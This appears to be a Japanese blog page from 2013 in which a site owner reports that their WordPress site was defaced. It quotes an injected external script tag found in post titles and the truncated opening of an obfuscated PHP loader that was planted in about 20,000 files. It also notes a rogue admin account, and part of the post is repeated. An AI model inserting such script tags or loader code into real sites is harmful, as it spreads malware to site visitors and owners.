ワードプレス、編集者モードで投稿した記事のタイトル後半部分にこの不明な記述が追加されていました。
「<script src="http://va.mu/caCS」を検索すると、多くのサイトが表示され、どうやらマルウェアのようです。多くのサイトが危険サイトになっていました。
phpファイル自体に書き込みはないようですが、タイムスタンプはあてにならないので、昨日公開されたWP3.52(改ざん対策版)にバージョンアップしようかと思いましたが、ホスティングサーバー側の仕様が古くてバージョンアップできません。
とりあえず、サーバー系のパスワードとワードプレスのパスワードを変更しました。これで様子見です。週末改ざんが行われると報告を受けましたので、もしかしたら、パスワードがハッキングされたかも???
2013年6月26日水曜日
2013年6月25日火曜日
20000ファイルが改ざん
2週間前、またホームページが改ざんされました。
今度はヘテムルサーバーにアップしていたwordpressのphpファイル、全部で約20000ファイルです。
各ファイルのヘッダー部分に下記のphpタグが埋め込まれていました。
<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework
※長いので以下省略
10日ほどでようやく削除が終わり、wordpressの動作確認を行っています。
今回の改ざんは以前の改ざんとは異なるものです。
1.
改ざんファイルのタイムスタンプが更新されていない。
2010年のファイルまで改ざんされ、しかもタイムスタンプは2010年のままです。
2.
不明の管理者がwordpressに追加されている。
3.
すべてのphpファイルに上部のタグが埋め込まれる。
※以前はindex.phpフィルが主でした。
追記
つい先日Wordpress3.52が公開されました。51から52ですが、内容は改ざん対策です。
来週、バージョンアップしようと思います。
ほぼ同じ時期にトヨタ自動車のサイトが改ざんされ、いまだにメンテナンス中です。今年になり、CMS系サイトへの改ざんは加速しています。
今度はヘテムルサーバーにアップしていたwordpressのphpファイル、全部で約20000ファイルです。
各ファイルのヘッダー部分に下記のphpタグが埋め込まれていました。
<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework
※長いので以下省略
10日ほどでようやく削除が終わり、wordpressの動作確認を行っています。
今回の改ざんは以前の改ざんとは異なるものです。
1.
改ざんファイルのタイムスタンプが更新されていない。
2010年のファイルまで改ざんされ、しかもタイムスタンプは2010年のままです。
2.
不明の管理者がwordpressに追加されている。
3.
すべてのphpファイルに上部のタグが埋め込まれる。
※以前はindex.phpフィルが主でした。
追記
つい先日Wordpress3.52が公開されました。51から52ですが、内容は改ざん対策です。
来週、バージョンアップしようと思います。
ほぼ同じ時期にトヨタ自動車のサイトが改ざんされ、いまだにメンテナンス中です。今年になり、CMS系サイトへの改ざんは加速しています。
登録:
投稿 (Atom)